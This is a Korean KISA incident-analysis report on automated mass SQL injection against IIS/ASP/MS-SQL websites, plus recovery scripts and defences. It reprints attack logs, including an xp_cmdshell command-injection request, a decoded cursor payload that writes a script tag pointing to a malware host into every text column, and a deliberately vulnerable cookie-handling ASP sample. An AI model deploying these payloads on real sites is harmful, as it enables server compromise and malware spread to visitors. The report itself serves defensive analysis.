< FC0DAB5BFC8ADB5C85F53514C5F496E6A F6EB0F8B0DDC0B8B7CEC0CEC7D15FBEC7BCBAC4DAB5E55FB4EBB7AE5FBBF0C0D4BCF6B9FDBAD0BCAE2E687770>
|
|
- 승현 도
- 5 years ago
- Views:
Transcription
1 자동화된 SQL Injection 공격을통한 악성코드대량삽입수법분석 (Mass SQL Injection) 본보고서의전부나일부를인용시, 반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다
2 < 차례 > 1. 개요 3 2. 사고원인분석 4 가. 대량악성코드삽입사고결과예시 4 나. SQL Injection 취약점 5 다. 악성코드삽입공격스크립트분석 6 라. SQL 명령주입지점의다양화 8 1) 사용자입력값에대한 SQL Injection 8 2) HTTP Header에대한 SQL Injection 8 3. 복구및대응방안 12 가. 복구방법 12 1) 데이터베이스백업본을사용한복구 12 2) 컬럼단위복구방법 12 3) 일괄복구스크립트사용 13 나. 대응방안 15 1) 동적 SQL사용지양 15 2) 안전한웹사이트설계와구현 15 3) 웹서버보안강화 17 4) 웹방화벽활용 20 5) 웹보안취약점점검 맺음말
3 1. 개요 인터넷홈페이지를대상으로지속되고있는개인정보유출사고나악성코드삽입사고는 SQL Injection 취약점으로인해발생한경우가대부분이다. SQL Injection 공격 은 악성 SQL문주입공격 으로도불리며, 홈페이지와데이터베이스가데이터를주고받을때적절한입력값검증을하지않아공격자가주입한 SQL 명령어가실행되면서발생한다. 이러한 SQL Injection 공격은지금도계속해서지속되고있고, 데이터베이스에악성코드가삽입된사고사례도분석된바있었다. [1] 하지만최근자동화된형태의공격수법과도구도발견되고있고수많은홈페이지를대상으로악성코드를대량으로삽입하는형태로확산되고있다. SQL Injection을이용한악성코드대량삽입사고의특징 데이터베이스에악성코드를대량으로삽입 자동삽입스크립트를사용하여한번에악성코드를대량삽입 POST나 HTTP Header( 쿠키, 리퍼러등 ) 를이용한경우는공격로그를찾기어려움 악성코드삽입과정에서데이터의손실또는유실발생 이러한특징을가진 SQL Injection 공격들은 Mass SQL Injection 이라는별칭도갖게되었으며, 지난 1월 SANS ISC에서대량악성코드삽입사고에대해분석자료 [2] 가공개된이후, 이와관련된사고사례나분석자료가잇따라발표되고있다. [3][4] 하지만결과적으로피해의정도만다를뿐이지, 그원인은변하지않았으며, 자동화된공격수법또한과거의 SQL Injection 공격을응용한것이다. [1] 홈페이지 > 2006 년 09 월인터넷침해사고동향및분석월보 > 악성코드삽입유형분석, p.46 [2] [3] &intsrc=hm_topic [4]
4 본기술문서에서는올해초부터발생하고확산되었던자동화된 SQL Injection 공격으로인한악성코드대량삽입사고에대해그원인과대응방안을살펴본다. 참고로, 본문서는윈도우즈의 IIS 및 ASP 에서 MS-SQL 서버를사용하는운영 환경을전제로기술하였다. 2. 사고원인분석 가. 대량악성코드삽입사고결과예시 과거에는웹사이트에접속하는 PC를감염시키기위해초기페이지나방문자가많은페이지를대상으로그페이지파일에악성코드를삽입하였다. 하지만본문서에서다루는악성코드대량삽입사고는데이터베이스의문자형컬럼의자료값모두에악성코드의유포지정보 (URI) 가삽입된다
5 나. SQL Injection 취약점 인터넷홈페이지는웹서버의어플리케이션을통해서비스를제공하고이러한응용계층에서의보안허점을웹보안취약점이라고한다. 그리고인터넷홈페이지침해사고의대부분이이러한웹보안취약점으로인해발생하고있으며, 그원인으로는 WASC(Web Application Security Consortium) 의통계를보더라도, 웹어플리케이션이전달받아처리하는입력값의검증절차문제가가장많다. [1] 그리고입력값검증문제의대표적인예로는 SQL Injection 공격과 XSS공격을들수있으며, SQL Injection 취약점이존재하는경우에는로그인인증우회, 시스템명령어실행, 회원개인정보와같은 DB 자료유출등의피해가발생한다. 예를들어, SQL Injection 취약점이있는웹사이트를통해 MS-SQL 서버의확장프로시저중 xp_cmdshell 을이용해시스템명령어를실행시키면윈도우즈 OS의내장명령어들을공격자가손쉽게사용할수있다. [2] 아래는그사례로써 SQL Injection 취약점을악용하여시스템명령을실행한당시의웹로그이다 :49:51 W3SVC XX GET /servic e/read3.asp idx=47';create TABLE [X_9]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] varchar(1024) NULL);insert in to [X_9](ResultTxt) EXEC MASTER..XP_CMDSHELL 'Dir C:\';in sert into [X_9](ResultTxt) values ('g_ov');exec master..s p_dropextendedproc 'xp_cmdshell' 이외에도다양한 SQL Injection 공격수법이있으며이에대한자세한내용은 가발간한자료에서상세히기술한바있다. [3][4] [1] Web Application Security Statistics Project [2] 홈페이지 > 웹보안 4종가이드 중 홈페이지개발보안가이드 제 3장 6절 악의적인명령어주입공격 (SQL Injection) 중 (2) MS-SQL상에서의시스템명령어실행 [3] 홈페이지 > 사고노트 > 문서번호 IN , "SQL Injection 취약점을이용한윈도우즈웹서버사고사례 ", [4] 홈페이지 > 웹보안 4종가이드 중 " 웹서버구축보안점검가이드 제 5장 2절 SQL Injection점검 - 5 -
6 다. 악성코드삽입공격스크립트분석 SQL Injection 취약점을이용하여대량의악성코드를삽입하는스크립트는여러종류가발견되었다. 대부분의경우스크립트의내용상거의유사하기때문에, 그중대표적인사례를들어실행방식을분석한다. 발견된공격스크립트형태아래의스크립트는웹로그에서확인한것이며, 본래의실행구문을공격자가 CAST 함수로인코딩한공격형태이다 C 중간생략 -- 아래는보안장비우회나로그분석시눈에띄기어렵게하는등의이유로난 독화 (obfuscation) 한형태이지만, 결국실행내용은다르지않다. 20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%2 -- 중간생략 -- ose%20table_cursor%20deallocate%20table_cursor;-- 인코딩되어있는공격스크립트를디코딩하면다음과같다. VARCHAR(255) DECLARE Table_Cur sor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,sys columns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_C ursor FETCH NEXT FROM Table_Cursor WHILE(@@FET CH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTR IM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=hxxp:/ /malcode/b.js></script>''') FETCH NEXT FROM Table_Cursor END CLOSE Table_Cursor DEALLOCATE Table_Cursor - 6 -
7 공격스크립트실행분석앞서예시한공격스크립트들은대부분아래의흐름도와같이실행된다. 공격스크립트의실행분석결과에서몇가지주목해야할특징이있다. 우선, 임시변수를선언하여테이블명과컬럼명을추출하기위해 DBMS의시스템테이블인 Sysobjects [1] 와 Syscolumns [2] 에저장되어있는데이터베이스정보를수집 (select) 하는부분이다. 이두테이블은데이터베이스에대한개체정보와컬럼에대한정보등을담고있다. 그러므로필요하지않다면, 이두테이블에대한조회권한을제거하는것만으로도악성코드삽입을예방할수있으며, 자세한보안강화 [1] [2]
8 방법은대응방안에서살펴본다. 공격스크립트에서 Sysobjects와 Syscolumns 테이블에서추출하고자하는정보는웹서비스용으로개발자가생성한테이블 [1] 정보와악성코드를삽입하기위해문자형으로생성된컬럼 [2] 정보이다. 테이블과컬럼정보를얻은후에는악성코드삽입대상컬럼의자료값을강제로자료형 (data type) 변환한후악성코드를붙여업데이트한다. 이과정에서자료형변환이잘못되어자료값이손상되거나유실될수있다. 예를들어원본컬럼이 "TEXT" 형으로설정된상태에서악성코드삽입을위한임시변수의크기를초과하는경우는그차이만큼자료가유실된다. 라. SQL 명령주입지점의다양화 1) 사용자입력값에대한 SQL Injection 지금까지 SQL Injection 공격은 HTTP의 GET이나 POST 메소드를통해취약점이존재하는인자에 SQL문을주입하는형태가대부분이었다. 아래는 GET 메소드를통해 SQL Injection을시도한당시의웹로그이다 XXX [08/Jun/2008:22:57: ] x c c C C655F F F F C E6E616D652C622E6E616D F4D F62 6A C F6C756D6E E69643D622E E E 이하생략 -- 2) HTTP Header에대한 SQL Injection 최근발견되는악성코드대량삽입사고들은 SQL 명령이주입되는지점이다양해지고있다. 즉, HTTP Header에포함되어있는쿠키 (cookie) 나리퍼러 (referer) 를통한 SQL Injection 공격도시도되고있다. [1] xtype = 'u' ; U:User table [2] b.xtype=99 OR b.xtype=35 OR b.xtype=167 ; 99:ntext, 35:text, 167:varchar - 8 -
9 쿠키에대한 SQL Injection 아래의트래픽로그는 HTTP Header를통해 SQL Injection공격이시도된사례로써쿠키에서사용된인자값에 SQL 명령주입을시도한경우이다. 쿠키값도서버측에서데이터베이스와연동되는부분이있다면취약점이존재할수있다. 쿠키의 SQL Injection 취약점을설명하기위해간단한웹페이지를예를들어본다. 웹사이트의프로그램소스는아래와같으며, ID와 Password가일치하면로그인을허용하면서접속자의 ID 값을쿠키에생성한다. 그리고로그인처리를수행하는페이지에서는 SQL Injection방지를위해 ID나 Password값에대해 InputFilter라는함수로보호했다. <% Dim UserID : UserID = InputFilter(Request.Form("UserID")) ' SQL Injection방어를위해 InputFilter사용 Dim UserPW : UserPW = InputFilter(Request.Form("UserPW")) Dim Result : Result = CheckLogin(UserID, UserPW) If Result = True Then Response.Cookies("www")("userid") = UserID Else Response.Write " 인증실패 " End If %> 아래는입력값에대한검증절차를수행하는 InputFilter함수이며, 이함수를사용하여입력값을검사한다면, 아래의예시코드에서명시한대로입력값이숫자와 영문자일경우에만허용한다
10 <% SQL Injection방어를위한 InputFilter 함수이며정수, 알파벳만입력가능 Function InputFilter(str) Dim i, ret ret = TRUE For i = 1 To Len(str) If Not((Asc(Mid(str, i, 1)) >= 48 And Asc(Mid(str, I, 1)) <= 57) Or (Asc(Mid(str, i, 1)) >= 65 And Asc(Mid(str, i, 1)) <= 90) Or (Asc(Mid(str, i, 1)) >= 97 And Asc(Mid(str, i, 1)) <= 122)) Then ret = FALSE End If -- 이하생략 -- 참고로, 위의입력값검증함수에서허용하는범위는 ASCII값으로변환하였을때 48~57은숫자, 65~90은영문대문자, 97~122는영문소문자를뜻한다. 이제접속자가게시물을작성하게되면, 아래의프로그램소스와같이제목과게시내용을입력받으며, 이때제목이나게시내용에혹시라도 SQL Injection 문자열이포함되어있는지검증하기위해 InputFilter 함수를사용했다. 그러므로제목이나게시내용은안전하게데이터베이스에전달될수있다. <% Dim Title : Title = InputFilter(Request.Form("Title")) Dim Content : Content = InputFilter(Request.Form("Content")) Dim Writer : Writer = Request.Cookies("www")("userid") ' 쿠키는그대로가져와서사용 SQL = "Insert Into Board (" SQL = SQL & "Title, Content, Writer " SQL = SQL & ") Values ( " SQL = SQL & " '" & Title & "', '" & Content & "', '" & Writer & "') " Db.Execute SQL ' SQL Injection 취약점발생!! %> 그러나쿠키값은상대적으로안전하다고생각해서입력값검증을하지않았기 때문에결국 SQL Injection 취약점이존재하는결과를초래했다
11 참고로, SQL Injection 관련사고를분석하면서웹방화벽이있음에도침해사고가발생한경우가다수있어웹방화벽의문제가있는지분석해보았으나, 웹방화벽의오류나버그가아니라운영자가 HTTP Header에대한공격차단기능을활성화시키지않은채로운영되고있었기때문에발생한사례였다. 예를들어, 윈도우즈 IIS 운영환경에서사용하는공개웹방화벽인 WebKnight의경우에도 Header Injection관련기능을활성화하지않으면쿠키나리퍼러의 SQL Injection공격을탐지하거나차단할수없다. 이에대한구체적인설정방법은대응방안에서살펴본다. 리퍼러에대한 SQL Injection HTTP Header 중리퍼러의정보를데이터베이스에입력하거나활용하는경우도마찬가지로 SQL Injection 취약점이존재할수있다. 리퍼러정보는페이지요청직전의접속정보를담고있기때문에마케팅이나웹사이트분석을위해많이활용하고있다. 아래의그림은리퍼러정보에 SQL Injection 취약점이존재하는지확인해본결과이다. 리퍼러값에작은따옴표 ( ) 를임의로입력하여서버내부오류를유발시킨결과로미루어볼때, 리퍼러에 SQL Injection취약점이존재한다고추정할수있었으며, 실제프로그램소스를분석한결과에서도취약점이있음을확인하였다. 그러므로어떠한경로를통해서입력된값이든검증절차가반드시필요하다
12 3. 복구및대응방안 가. 복구방법 1) 데이터베이스백업본을사용한복구침해사고가발생하기이전의백업본이있다면그백업본을이용하여복구하는것이가장빠를것이다. 그러나실시간으로갱신되는데이터베이스의특성상핫백업과같이백업도실시간으로이루어지고있다면다행이지만, 대부분의경우백업된시점이후의자료유실이불가피하다. 그러므로백업본으로복구할때에는반드시자료유실에대한충분한검토가필요하다. 예를들어, 일일백업이새벽 3시에이루어지고있던데이터베이스라면침해사고가오후 1시에발생한경우 10시간동안갱신된자료의유실에대해고려해야한다. 2) 컬럼단위복구방법지금까지발견된악성코드삽입사고는아무리많은레코드에악성코드가삽입됐더라도특정악성코드유포지 (URI) 를담고있었기때문에 UPDATE SQL 명령문을사용해도충분히복구할수있다. 그러나실제적용전에는반드시시험을거친후적용해야한다. Update [ 테이블명 ] set [ 컬럼명 ]=replace([ 컬럼명 ],'[ 삭제하고자하는악성코드문자열 ]','') 예 > Update freebbs set title=replace(title,'<script src=hxxp://url/ b.js></script>','') 만약저장되어있던자료가 ntext, nvarchar와같이유니코드를지원하는등별도의인코딩방식으로저장되어있는경우, 자료형변환을통해삽입된악성코드를좀더수월하게찾아내고제거할수있다
13 다만, 자료형변환에서사용하는임시변수의크기를충분히지정해야추가적인자료유실을예방할수있다. Update [ 테이블명 ] Set [ 컬럼명 ] = replace(cast([ 컬럼명 ] as varchar(8000)), '[ 삭제하고자하는악성코드문자열 ]', '') 예 > Update freebbs Set contents = replace(cast(contents as varchar(8000)), '<script src=hxxp://url/b.js></script>', '') 참고로 MS SQL 2005 이상에서는 varchar(max) 를사용할수있으며, 이외에도 다양한자료형에대해고려해야하므로, SQL 서버에서사용하는큰값자료형 문서를참고하고, UPDATETEXT 문을사용하는것도함께고려한다. [1][2] 3) 일괄복구스크립트사용컬럼단위의복구스크립트는복구대상컬럼이많은경우, 적지않은시간이필요하기때문에악성코드삭제를더빠르게수행하고자한다면일괄복구스크립트를참조하여적용한다. [1] MS-SQL에서사용하는큰값자료형 : [2] MS-SQL UPDATETEXT:
14 -- Mass SQL Injection 피해 DB 일괄복구스크립트, 한국마이크로소프트제공 -- 사고의특성상 DB 자료값들이 varchar 또는 nvarchar 등으로형변환되거나제한된임시공간에저장되는과정이있어자료의유실이나손상이발생합니다. -- 그러므로, 본복구스크립트는이러한전형적인 Mass SQL Injection 피해를입은 DB의복구에만사용하시기바랍니다. -- 본복구스크립트는 DB관리자와충분히검토하신후적용하셔야하며, 이에대한책임은전적으로사용자에게있습니다. -- Mass SQL Injection에대한자료는 홈페이지 ( 보안공지또는기술문서를참조하시기바랍니다 , int declare table_cursor cursor for select so.name, sc.name, sc.xtype, su.name from sysobjects so inner join syscolumns sc on so.id = sc.id inner join sysusers su on so.uid = su.uid where so.xtype='u' and (sc.xtype=99 or sc.xtype=35 or sc.xtype=231 or sc.xtype=167) open table_cursor fetch next from while(@@fetch_status=0) begin -- varchar, text 또는 nvarchar, ntext 일경우 MS-SQL 2005 이상의환경이라면 varchar(max) 또는 nvarchar(max) 으로변경하여사용 -- 악성코드부분을실제삭제하려는악성코드로수정 ( 악성코드예 : <script src=hxxp://malcode.tld></script>) if (@type = 35 = 167) exec('update ' + '.[' + '] set [' + '] = replace(convert(varchar(8000), [' + ']), '< 악성코드 >','''')') else exec('update ' + '.[' + '] set [' + '] = replace(convert(nvarchar(4000), [' + ']), '< 악성코드 >','''')') print '[' + ']' + ' column of ' + '.' + ' has been updated.' fetch next from end close table_cursor deallocate table_cursor 위의일괄복구스크립트도복구대상데이터베이스에직접적용하기전에문제가없는지반드시테스트환경에서확인을거쳐야한다
15 일괄복구스크립트에서도강제형변환을사용했기때문에공격스크립트처럼데이터의유실이발생할소지가있다. 하지만앞서분석한형태의공격스크립트였다면이미임시변수의크기에맞게데이터가조정된상태이므로추가적인데이터의유실은없을것이다. 나. 대응방안 1) 동적 SQL사용지양데이터베이스와의연동부분에서는동적 SQL을더이상사용하지말고저장프로시저를사용해야한다 [1][2]. 지금까지도많이사용되고있는동적 SQL 완성방식은변수의입력값을연결시켜 SQL문을완성 (Concatenation of SQL) 시키는형태이므로공격자의 SQL문주입이매우용이하다. 그러나저장프로시저를통해데이터베이스연동을구현한다면, 이미프로시저내부에서입력값에대한자료형검증이이루어진다. 또한해당프로시저의내부에서만영향을끼치기때문에보안측면에서도더욱더안전하고, 성능이나유지보수측면에서도대단히효과적이다. 2) 안전한웹사이트설계와구현 SQL Injection 취약점은입력값검증절차문제에기인하므로, 개발단계에서부터반드시모든입력값에대해적절한검증절차를설계하고구현해야한다. 예를들어게시판의이름을처리해야하는페이지가있다면게시판이름에대한입력값에대해다음의예시와같이검증할수있다. 간략히검증과정을요약하면, 입력값의크기를검사하고특수문자가있는경우위험하지않은문자로치환한후입력값이허용범위내에존재하는지검사하는방식이다. 게시판이름처리용검증함수예시 입력값을전달받을변수를선언하고가장먼저 LenStr 함수를사용하여입력값이 10 자이내인지검증한다. [1] [2]
16 Dim bbstitle : bbstitle = (InputFilter(ReplaceChar(LenStr(Request.QueryString( title"),10))) 특수문자치환함수예시입력값에부적절한특수문자가있는지검사하여서버나브라우저에서실행되지않는안전한코드로치환한다. 예를들어작은따옴표 ( ) 나부등호 (<,>) 를입력하더라도 HTML에서표현가능한문자코드로치환되므로서버나브라우저에서는프로그램의일부로써실행되지않고화면에표시만한다. 그러므로정상적인접속자의입장에서는웹브라우저에서동일하게나타내주기때문에불편함이없다. [1] Function ReplaceChar(str) ReplaceChar = "" If str <> "" Then str = replace(str, "<", "<") str = replace(str, ">", ">") str = replace(str, """, """) str = replace(str, " ", " ") str = replace(str, "$", "$") str = replace(str, "%", "%") str = replace(str, "'", "'") str = replace(str, "/", "/") str = replace(str, "(", "(") str = replace(str, ")", ")") str = replace(str, ",", ",") End If ReplaceChar = str End Function 허용범위검증함수예시입력값이적절한허용범위에속하는지확인하는함수이다. 허용할범위만정의하여그외의입력값은모두예외처리하는구조이므로공격패턴의변화에의존적이지않다. [1] -
17 Function InputFilter(str) ' 정수, 알파벳, &, #, ; 만허용 Dim i, ret ret = TRUE For i = 1 To Len(str) If Not((Asc(Mid(str, i, 1)) >= 48 And Asc(Mid(str, i, 1)) <= 57) Or (Asc(Mid(str, i, 1)) >= 65 And Asc(Mid(str, i, 1)) <= 90) Or (Asc(Mid(str, i, 1)) >= 97 And Asc(Mid(str, i, 1)) <= 122) Or Asc(Mid(str, i, 1)=35 Or Asc(Mid(str, i, 1)) = 38 Or Asc(Mid(str, i, 1)) = 59) Then ret = FALSE End If Next If ret = TRUE Then titlecheck = str Else titlecheck = 0 Response.Write "<script>alert(' 부적절한값이입력되었습니다.'); history.back();</script> Response.End End If End Function 만약이러한허용범위명시방식또는 White List로검증하는 Positive Filtering 방식으로검증하지않고, 거부나차단대상을나열하는허용불가명시방식또는 Black List로검증하는 Negative Filtering 방식으로구현한다면지속적으로거부할대상을일일이추가해주어야하는어려움이발생한다. 그러므로반드시허용할대상을명시하고그이외의경우는예외처리를해야시간이나비용면에서도훨씬효과적이다. 3) 웹서버보안강화 SQL Injection 에대한근본적인문제해결을위해서는프로그램보완조치가 반드시필요하지만, 웹서버의보안강화설정을통해서도보완적인효과를볼수있다. 자세한오류내용표시차단 IIS 웹서버에서는기본적으로웹서비스의오류가발생할때, 자세한오류메시지를접속자에게표시하게되어있다. 그러므로이설정을변경하여공격자가오류메시지를통해유용한정보를수집할수없도록수정해야한다
18 일반적인 SQL Injection 공격의경우오류메시지를기반으로정보를추출하게되므로, 이설정변경만으로도방어효과를볼수있다. 다만, Blindfolded SQL Injection [1] 이나시스템명령어를수행하는 SQL Injection공격은차단할수없으므로반드시프로그램수정의보완조치로활용해야한다. SQL 서버보안강화웹페이지와 MS-SQL 서버를연동할때, 데이터베이스의관리자계정인 SA 계정을사용하게되면공격자가악용할수있으므로매우위험하다. 그러므로반드시사용자계정을사용하고최소권한만을할당하여사용해야한다. 또한, 앞서분석한공격스크립트의경우시스템테이블인 Syscolumns와 Sysobjects의정보를이용하고있으므로, 반드시필요하지않은경우라면사용자계정이나 public 계정에할당되어있는 SELECT 권한을제거하는것이안전하다. [1]
19 그리고위의설정을명령어를통해실행시키고자한다면아래의스크립트와 같이실행하면된다. use < 사용자데이터베스명 > go DENY SELECT ON sysobjects TO userid DENY SELECT ON syscolumns TO userid go 위의명령을실행하면 userid 라는사용자계정에대해서 Sysobjects 및 Syscolumns 테이블에대한 SELECT 권한을제한하게되며, 해당사용자계정에서 Sysobjects나 Syscolumns 시스템테이블조회시다음과같은오류와함께실패하게된다. [ 오류메시지 ] 서버 : 메시지 229, 수준 14, 상태 5, 줄 1 'dbo' 소유자, 'pubs' 데이터베이스, 'sysobjects' 개체에대한 SELECT 사용권한이거부되었습니다
20 만약특정사용자계정에대해서 Sysobjects 및 Syscolumns 시스템테이블에대한 SELECT 권한을다시부여하려면아래와같이실행하면된다. use < 사용자데이터베스명 > go GRANT SELECT ON sysobjects TO userid GRANT SELECT ON syscolumns TO userid go 4) 웹방화벽활용웹보안취약점의근본적인문제해결을위해서는프로그램의보완조치가반드시필요하다. 하지만운영중인홈페이지에서프로그램수정으로인한문제들도검토하여조치해야하기때문에, 그시간동안은웹방화벽이나부가적인보완조치들을통해시간을확보할수있다. 예를들어윈도우즈의 IIS 환경이라면 URLScan [1] 이나공개웹방화벽 WebKnight [2] 를활용하여보안수준을향상시킬수있다. 특히 WebKnight의경우는 의공개웹방화벽안내페이지 [3] 에서각종가이드와표준정책및기술지원도제공하고있다. 참고로이번분석에서언급한, 쿠키에대한 SQL Injection공격을차단하기위해서는반드시그림과같이해당기능을활성화해야한다. HTTP 헤더의특성상특수문자가많이사용되므로, 차단설정후에는일정 기간동안로그모니터링을통해서비스에문제가없는지확인해야한다. [1] URLScan 도구를구성하는방법 [2] [3] 공개웹방화벽안내홈페이지 > 공개웹방화벽배너참조
21 하지만, 어디까지나웹방화벽은보완장치로활용해야하며, 프로그램수정조치등의근본적인원인제거가반드시수행되어야한다. 예를들어전쟁에나간병사가아무리튼튼한갑옷을입었더라도건강하지않거나기본체력이충분치않다면결국그갑옷조차무용지물이될것이다. 5) 웹보안취약점점검설계와구현에있어서안전한개발절차에따라개발되었더라도존재할수있는보안문제들을점검하고진단하는과정이필요하다. 특히 SQL Injection의경우는프로그램소스상에서입력값검증이적절히이루어졌는지점검 (White box test) 해보고웹취약점점검도구를병행하여점검 (Black box test) 해본다면더욱더안전한웹서비스운영이될것이다. 예를들어마이크로소프트에서제공하는소스코드검사도구인 Microsoft Source Code Analyzer for SQL Injection [1] 을활용하거나, 윈도우즈내장명령어인 findstr 을통해외부로부터입력받는데이터가검증함수를거치는지확인해볼필요가있다. 아래의점검예제는 "findstr" 명령어를사용하여입력값을받는프로그램소스부분을검사하는예제이다. 아래의예시대로검사하면입력값검증함수를동일행에서처리하지않는경우를찾아볼수있다. findstr /I /S /G [request 객체목록 ] *.asp findstr /I /V "[ 입력값검증함수명 ]" 예 ) findstr /I /S /G arglist.txt *.asp findstr /I /V "inputfilter\(" [1] -
22 arglist.txt request.form request.querystring request.servervariables request.cookies request\( 그리고웹취약점점검도구를사용해서진단해볼수도있는데, 웹보안점검도구는 sectools.org [1] 나 NIST 홈페이지 [2] 등에서소개하고있다. 또한, PAROS, N-Stealth, Scrawlr, Wikto 등의무료점검도구들을활용하여점검해볼수있다. 그리고 에서제공하는원격웹취약점점검서비스를이용하면웹취약점원격점검서비스를제공받을수있으며, 점검신청은홈페이지 ( 에서접수받고있다. 다만, 비영리단체나영세기업등정보보호취약계층을대상으로제공하므로서비스대상에해당하는경우에만서비스받을수있다. [1] [2]
23 웹서비스의논리적오류나특화된서비스에대해정밀한점검이필요한경우에는현황파악과문제점진단과정에있어서매우전문적인인력과많은시간이필요하다. 그러므로정보보호전문업체의컨설팅을통해더욱더깊이있고상세한진단을받을것을권고한다
24 4. 맺음말 인터넷홈페이지를운영한다면대부분의접속자들은홈페이지운영자의고객일것이다. 하지만공격자들로인해악성코드가삽입되고, 이러한악성코드때문에접속자들이피해를입는다면, 웹서버침해사고로인한손실보다더욱더심각한문제로발전하게된다. 예를들어기업의제품홍보페이지에접속했다가악성코드에다수의고객 PC가감염된다면그기업은치명적이고심각한문제에직면할것이다. 그러므로시행착오를겪더라도보안수준강화를위한일련의업무들을절차로확립하고꾸준히개선시켜나간다면성공적인서비스운영뿐만아니라그경험조차큰자산이될것이다. 마지막으로프로그램개발이나서버관리도사람이하는일이므로실수는있기마련이지만, 그실수조차도방지하는데도움이될수있도록 Foolproof 라는개념을소개한다. Foolproof 는사람이실수할수없도록사전에예방장치를마련하는개념이며, 컴퓨터의파일삭제나하드디스크포맷시에사용자에게경고를하는절차를예로들수있으며, 자동차의경우에브레이크를밟지않은상태에서는시동이걸리지않도록하는장치등이해당된다. 아래의그림은 LAN에서흔히쓰는 RJ-45 커넥터와비디오카메라뒷면의각종연결포트들이다
25 그림을살펴보면각종케이블의연결포트들이사람이실수하더라도잘못끼울수없도록만들었기때문에사람의실수를미연에방지할수있다. 소프트웨어개발이나서버관리에도이러한개념을도입하여효과적인체크리 스트를개발하고적용하는노력과함께안전한서버운영절차를마련하고개선 시켜나간다면보안수준향상에큰도움이될것이다
Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More information로거 자료실
redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...
More information문서 템플릿
HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,
More informationSKINFOSEC-CHR-028-ASP Mssql Cookie Sql Injection Tool 분석 보고서.doc
Asp Mssql Sql Injection Tool 분석보고서 이재곤 (x0saver@gmail.com) SK Infosec Co., Inc MSS 사업본부 / 침해대응센터모의해킹파트 Table of Contents 1. 개요... 3 2. 구성... 3 3. 분석... 4 3.1. 기능분석... 4 4. 공격원리...14 4.1 기본공격원리...14 4.2
More informationMicrosoft Word - Mass SQL Injection_v.1.3._.doc
Mass SQL Injection by visu4l ( kchclub3@wowhacker.org ) Table of Contents 1st. 개요 1. 배경 2. 공격대상시스템 3. 소개 2nd. 공격형태 1. 공격쿼리 2. 로그분석 3. 공격형태도식화 3rd. 공격피해사이트확인 4th. 대응 1. 사전대응 2. 사후대응 3. IDS/IPS 탐지 4. 사용자대응
More information다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");
다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher
More informationPowerPoint 프레젠테이션
HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리
More informationMySQL-.. 1
MySQL- 기초 1 Jinseog Kim Dongguk University jinseog.kim@gmail.com 2017-08-25 Jinseog Kim Dongguk University jinseog.kim@gmail.com MySQL-기초 1 2017-08-25 1 / 18 SQL의 기초 SQL은 아래의 용도로 구성됨 데이터정의 언어(Data definition
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
